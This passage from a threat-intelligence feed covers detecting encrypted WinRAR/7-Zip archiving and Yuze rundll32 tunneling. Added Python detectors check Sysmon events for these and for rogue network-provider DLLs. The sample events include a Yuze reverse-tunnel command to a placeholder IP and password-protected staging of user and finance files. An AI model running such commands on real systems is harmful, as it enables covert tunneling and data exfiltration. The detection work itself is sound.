the staging location to remove evidence of the activity.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eA successful attack can lead to the exfiltration of sensitive data, including personally identifiable information (PII), financial records, intellectual property, and other confidential information. This can result in significant financial losses, reputational damage, legal liabilities, and regulatory fines for the victim organization. 
The number of victims and specific sectors targeted will vary depending on the attacker\u0026rsquo;s objectives and the nature of the compromised data.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Detect Encrypting Files with WinRar or 7z - CommandLine\u0026rdquo; to your SIEM to detect the execution of WinRAR or 7-Zip with encryption parameters.\u003c/li\u003e\n\u003cli\u003eEnable process creation logging with command-line arguments (Sysmon Event ID 1, or Security Event ID 4688 with command-line auditing enabled) so that the switches are available to the rule.\u003c/li\u003e\n\u003cli\u003eInvestigate every alert to determine the scope and impact of the potential exfiltration: which user and parent process created the archive, which paths were added to it, and where it was written (a temporary directory, a share or removable media suggests staging).\u003c/li\u003e\n\u003cli\u003eTune for legitimate use; scheduled backup and packaging jobs that create password-protected archives should be allowlisted by parent process and destination path rather than by switch.\u003c/li\u003e\n\u003cli\u003eMonitor network traffic for unusual outbound connections, particularly to cloud storage services or other external destinations, that may indicate data exfiltration.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-03T12:00:00Z","date_published":"2024-01-03T12:00:00Z","id":"/briefs/2024-01-winrar-7zip-encryption/","summary":"Adversaries use WinRAR or 7-Zip with encryption options to compress and protect stolen data before exfiltration, making detection more challenging.","title":"Detection of Encrypted Archive Creation with WinRAR or 7-Zip","url":"https://feed.craftedsignal.io/briefs/2024-01-winrar-7zip-encryption/"},{"_cs_actors":[],"_cs_cves":[],"_cs_exploited":false,"_cs_products":["Defender XDR","Elastic Defend","Elastic Endgame"],"_cs_severities":["medium"],"_cs_tags":["command-and-control","tunneling","yuze","proxy"],"_cs_type":"advisory","_cs_vendors":["Microsoft","Elastic","Crowdstrike","SentinelOne"],"content_html":"\u003cp\u003eThis rule detects the execution of Yuze, an open-source tunneling tool written in C, which 
is commonly used for intranet penetration, that is, pivoting from a compromised host into internal networks. Yuze supports both forward and reverse SOCKS5 proxy tunneling and is often executed using \u003ccode\u003erundll32\u003c/code\u003e to load \u003ccode\u003eyuze.dll\u003c/code\u003e through its \u003ccode\u003eRunYuze\u003c/code\u003e export, with the tunnel parameters passed on the \u003ccode\u003erundll32\u003c/code\u003e command line. Threat actors can leverage Yuze to proxy command and control (C2) communications or to pivot within a network. The detection focuses on \u003ccode\u003erundll32\u003c/code\u003e processes whose command-line arguments are indicative of Yuze execution, specifically those involving \u0026ldquo;reverse,\u0026rdquo; \u0026ldquo;-c,\u0026rdquo; \u0026ldquo;proxy,\u0026rdquo; \u0026ldquo;fwd,\u0026rdquo; and \u0026ldquo;-l\u0026rdquo; parameters. This activity has been observed in real-world campaigns, which makes timely detection and response important.\u003c/p\u003e\n\u003ch2 id=\"attack-chain\"\u003eAttack Chain\u003c/h2\u003e\n\u003col\u003e\n\u003cli\u003eThe attacker gains initial access to a target system through various means (e.g., phishing, exploitation of vulnerabilities).\u003c/li\u003e\n\u003cli\u003eThe attacker uploads or drops the \u003ccode\u003eyuze.dll\u003c/code\u003e file onto the compromised host.\u003c/li\u003e\n\u003cli\u003eThe attacker uses \u003ccode\u003erundll32.exe\u003c/code\u003e to execute \u003ccode\u003eyuze.dll\u003c/code\u003e, calling the \u003ccode\u003eRunYuze\u003c/code\u003e export.\u003c/li\u003e\n\u003cli\u003eThe remainder of the command line, which \u003ccode\u003erundll32\u003c/code\u003e hands to the export as its argument string, selects a reverse or forward SOCKS5 proxy tunnel and its endpoint (e.g., \u003ccode\u003erundll32 yuze.dll,RunYuze reverse -c \u0026lt;ip\u0026gt;:\u0026lt;port\u0026gt;\u003c/code\u003e).\u003c/li\u003e\n\u003cli\u003eYuze establishes a tunnel to a remote server, allowing the attacker to proxy network traffic.\u003c/li\u003e\n\u003cli\u003eThe attacker uses the established tunnel to pivot within the network and access internal resources.\u003c/li\u003e\n\u003cli\u003eThe attacker may proxy C2 traffic through the tunnel, masking the true origin of 
the commands.\u003c/li\u003e\n\u003cli\u003eThe attacker performs actions on the internal network, such as data exfiltration or lateral movement, using the tunnel as a covert channel.\u003c/li\u003e\n\u003c/ol\u003e\n\u003ch2 id=\"impact\"\u003eImpact\u003c/h2\u003e\n\u003cp\u003eSuccessful execution gives the attacker a covert communication channel that bypasses network security controls and proxies malicious traffic, potentially leading to unauthorized access to sensitive data, lateral movement within the network, and data exfiltration. Because the tunnel masks the origin of the traffic, Yuze also complicates attribution and hinders incident response.\u003c/p\u003e\n\u003ch2 id=\"recommendation\"\u003eRecommendation\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eDeploy the Sigma rule \u0026ldquo;Potential Yuze Tunneling via Rundll32\u0026rdquo; to your SIEM to detect the execution of \u003ccode\u003eyuze.dll\u003c/code\u003e via \u003ccode\u003erundll32.exe\u003c/code\u003e with the command-line arguments listed above.\u003c/li\u003e\n\u003cli\u003eEnable process creation logging with command-line arguments (Sysmon Event ID 1, or Security Event ID 4688 with command-line auditing enabled) to capture the information the Sigma rule needs.\u003c/li\u003e\n\u003cli\u003eInvestigate any identified instances of \u003ccode\u003erundll32.exe\u003c/code\u003e executing \u003ccode\u003eyuze.dll\u003c/code\u003e, focusing on the parent process, the directory the DLL was loaded from, and the network connections the process makes.\u003c/li\u003e\n\u003cli\u003eExpect renamed copies of the DLL: a file-name match is easy to evade, whereas the \u003ccode\u003eRunYuze\u003c/code\u003e export and the tunnel arguments must appear on the command line for the tool to run, so match on those as well and collect the DLL\u0026rsquo;s hash for hunting.\u003c/li\u003e\n\u003cli\u003eBlock the C2/relay IP or domain found in the \u003ccode\u003e-c\u003c/code\u003e argument at DNS/firewall, as described in the Triage and Analysis section of the rule\u0026rsquo;s note.\u003c/li\u003e\n\u003c/ul\u003e\n","date_modified":"2024-01-02T12:00:00Z","date_published":"2024-01-02T12:00:00Z","id":"/briefs/2024-01-yuze-tunneling/","summary":"This alert detects potential protocol tunneling activity via the execution of Yuze, a lightweight open-source tunneling tool often used by threat actors for intranet 
penetration via forward and reverse SOCKS5 proxy tunneling.","title":"Potential Protocol Tunneling via Yuze","url":"https://feed.craftedsignal.io/briefs/2024-01-yuze-tunneling/"}],"language":"en","title":"CraftedSignal Threat Feed — Defender XDR","version":"https://jsonfeed.org/version/1.1"}
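Added worked example for the "Network Logon Provider Registry Modification" brief in the feed above. This is an editor's example, not the brief's Sigma rule or any vendor's code. It evaluates Sysmon Event ID 13 (RegistryEvent Value Set) records against the ProviderPath value the brief names and alerts when the registered DLL is not in a baseline allowlist or lives outside System32. The RegistrySetEvent fields, the three-entry allowlist of built-in provider DLLs and the sample events are constructed assumptions for illustration; tune the allowlist to the providers actually installed in your estate.

```python
import fnmatch
import re
from dataclasses import dataclass
from typing import List, Optional


@dataclass
class RegistrySetEvent:
    """Subset of Sysmon Event ID 13 (RegistryEvent Value Set) fields (assumed shape)."""
    target_object: str  # registry value path as Sysmon logs it
    details: str        # data written to the value (the provider DLL path)
    image: str          # process that performed the write


# Sigma-style wildcard: any ControlSet, any service name.
PROVIDER_PATH_GLOB = r"hklm\system\*controlset*\services\*\networkprovider\providerpath"
SERVICE_RE = re.compile(r"\\services\\([^\\]+)\\networkprovider\\providerpath$", re.IGNORECASE)

# Assumed baseline of built-in provider DLLs; extend with the VPN and
# virtualization providers present in your environment.
KNOWN_PROVIDER_DLLS = {
    "%systemroot%\\system32\\ntlanman.dll",  # LanmanWorkstation (SMB shares)
    "%systemroot%\\system32\\davclnt.dll",   # WebClient (WebDAV)
    "%systemroot%\\system32\\drprov.dll",    # RDP drive redirection
}
SYSTEM32_PREFIX = "%systemroot%\\system32\\"


def normalize_path(path: str) -> str:
    """Lower-case and fold C:\\Windows into %SystemRoot% so both spellings compare equal."""
    path = path.strip().strip('"').lower()
    return re.sub(r"^c:\\windows(?=\\)", "%systemroot%", path)


def evaluate(ev: RegistrySetEvent) -> Optional[dict]:
    """Return an alert dict for a suspicious ProviderPath write, else None."""
    if not fnmatch.fnmatchcase(ev.target_object.lower(), PROVIDER_PATH_GLOB):
        return None  # some other registry value
    match = SERVICE_RE.search(ev.target_object)
    service = match.group(1) if match else "?"
    dll = normalize_path(ev.details)
    reasons = []
    if dll not in KNOWN_PROVIDER_DLLS:
        reasons.append("provider DLL not in baseline allowlist")
    if not dll.startswith(SYSTEM32_PREFIX):
        reasons.append("provider DLL outside %SystemRoot%\\System32")
    if not reasons:
        return None  # a known provider re-registered in place
    return {"service": service, "dll": dll, "image": ev.image, "reasons": reasons}


def scan(events: List[RegistrySetEvent]) -> List[dict]:
    return [alert for alert in map(evaluate, events) if alert]


# Constructed sample telemetry, not real events.
SAMPLE_EVENTS = [
    RegistrySetEvent(r"HKLM\System\CurrentControlSet\Services\LanmanWorkstation\NetworkProvider\ProviderPath",
                     r"%SystemRoot%\System32\ntlanman.dll", r"C:\Windows\System32\svchost.exe"),
    RegistrySetEvent(r"HKLM\System\CurrentControlSet\Services\NPLogon\NetworkProvider\ProviderPath",
                     r"C:\ProgramData\nplogon.dll", r"C:\Users\Public\setup.exe"),
    RegistrySetEvent(r"HKLM\System\CurrentControlSet\Services\LanmanWorkstation\Parameters\EnableSecuritySignature",
                     "1", r"C:\Windows\regedit.exe"),
    RegistrySetEvent(r"HKLM\System\ControlSet001\Services\EvilProv\NetworkProvider\ProviderPath",
                     r"C:\Windows\System32\evilprov.dll", r"C:\Windows\System32\msiexec.exe"),
]

if __name__ == "__main__":
    for alert in scan(SAMPLE_EVENTS):
        print(alert)
```

The last sample shows why the allowlist matters: a DLL dropped into System32 passes the path check and is caught only because it is not a known provider. A rogue provider must also be added to the `ProviderOrder` list under `HKLM\SYSTEM\CurrentControlSet\Control\NetworkProvider\Order` before mpr.dll will load it, so a write to that value by the same process is a useful corroborating event.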
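Added worked example serving both the "Detection of Encrypted Archive Creation with WinRAR or 7-Zip" brief and the "Potential Protocol Tunneling via Yuze" brief above. It is an editor's example, not either brief's Sigma rule. It runs two checks over Sysmon Event ID 1 style process-creation records: one flags archive creation with the password and header-encryption switches the archiver brief lists and records whether file names are hidden as well; the other flags rundll32 loading a DLL through the RunYuze export with the tunnel arguments the Yuze brief lists and extracts the host and port after -c for blocking. The ProcessEvent fields, all sample command lines, the documentation address 203.0.113.10 and the treatment of -l as an opaque value (the brief lists the flag but not its meaning) are assumptions.

```python
import re
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class ProcessEvent:
    """Subset of Sysmon Event ID 1 (process creation) fields (assumed shape)."""
    image: str
    command_line: str
    parent_image: str


def _exe(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def check_archiver(ev: ProcessEvent) -> Optional[dict]:
    """Archive creation with a password.

    rar.exe/WinRAR.exe: -p or /p encrypts file data, -hp or /hp also encrypts
    the headers (file names). 7z.exe/7za.exe: -p sets the password and
    -mhe=on additionally hides file names.
    """
    exe = _exe(ev.image)
    if exe in ("rar.exe", "winrar.exe"):
        pw, hide = ("-p", "/p", "-hp", "/hp"), ("-hp", "/hp")
    elif exe in ("7z.exe", "7za.exe"):
        pw, hide = ("-p",), ("-mhe",)
    else:
        return None
    args = ev.command_line.split()[1:]
    if not args or args[0].lower() != "a":  # only the add command, as the rule does
        return None
    switches = [a.lower() for a in args[1:] if a.startswith(("-", "/"))]
    if not any(s.startswith(pw) for s in switches):
        return None
    hidden = any(s.startswith(hide) for s in switches)
    archive = next((a for a in args[1:] if not a.startswith(("-", "/"))), None)
    return {"tool": exe, "archive": archive, "filenames_hidden": hidden}


YUZE_MARKER = re.compile(r"yuze\.dll\s*,|,\s*runyuze\b", re.IGNORECASE)
YUZE_TOKENS = {"reverse", "proxy", "fwd", "-c", "-l"}  # the argument set the brief lists


def _split_endpoint(value: Optional[str]) -> Tuple[Optional[str], Optional[str]]:
    """'host:port' -> (host, port); a bare host has no port."""
    if not value:
        return None, None
    host, sep, port = value.rpartition(":")
    return (host, port) if sep else (value, None)


def check_yuze(ev: ProcessEvent) -> Optional[dict]:
    """rundll32 loading Yuze through its RunYuze export with tunnel arguments."""
    if _exe(ev.image) != "rundll32.exe" or not YUZE_MARKER.search(ev.command_line):
        return None
    args = ev.command_line.split()
    tokens = [a for a in args if a.lower() in YUZE_TOKENS]
    if not tokens:
        return None
    values = {flag: args[i + 1] for i, flag in enumerate(args)
              if flag in ("-c", "-l") and i + 1 < len(args)}
    host, port = _split_endpoint(values.get("-c"))  # the relay to block at DNS/firewall
    return {"parent": ev.parent_image, "tokens": tokens, "block_host": host,
            "block_port": port, "l_arg": values.get("-l")}  # -l meaning not given in the brief


CHECKS = (("archiver-encryption", check_archiver), ("yuze-rundll32", check_yuze))


def scan(events: List[ProcessEvent]) -> List[Tuple[str, dict]]:
    hits = []
    for ev in events:
        for name, check in CHECKS:
            hit = check(ev)
            if hit:
                hits.append((name, hit))
    return hits


# Constructed sample command lines, not real telemetry.
SAMPLE_EVENTS = [
    ProcessEvent(r"C:\Program Files\WinRAR\Rar.exe",
                 r"Rar.exe a -hpS3cret! -r C:\Users\Public\stage\data.rar C:\Users\alice\Documents\*",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Tools\7z.exe",
                 r"7z.exe a -pHunter2 -mhe=on C:\Users\Public\out.7z C:\Finance\*",
                 r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"),
    ProcessEvent(r"C:\Tools\7z.exe", r"7z.exe x C:\Downloads\backup.7z", r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Program Files\WinRAR\WinRAR.exe", r"WinRAR.exe a /pPass docs.rar D:\docs",
                 r"C:\Windows\explorer.exe"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe",
                 r"rundll32.exe C:\Users\Public\yuze.dll,RunYuze reverse -c 203.0.113.10:443",
                 r"C:\Windows\System32\cmd.exe"),
    ProcessEvent(r"C:\Windows\System32\rundll32.exe", r"rundll32.exe shell32.dll,Control_RunDLL",
                 r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for name, hit in scan(SAMPLE_EVENTS):
        print(name, hit)
```

Both checks tokenize on whitespace, which is enough for these switches but not for quoted paths containing spaces; a production rule should use the parsed argument list where the sensor provides one. The archiver check deliberately matches only the `a` (add) command, as the Sigma rule does, so extracting an encrypted archive with `-p` is not flagged, and the Yuze check keys on the `RunYuze` export as well as the file name so that a renamed DLL still fires.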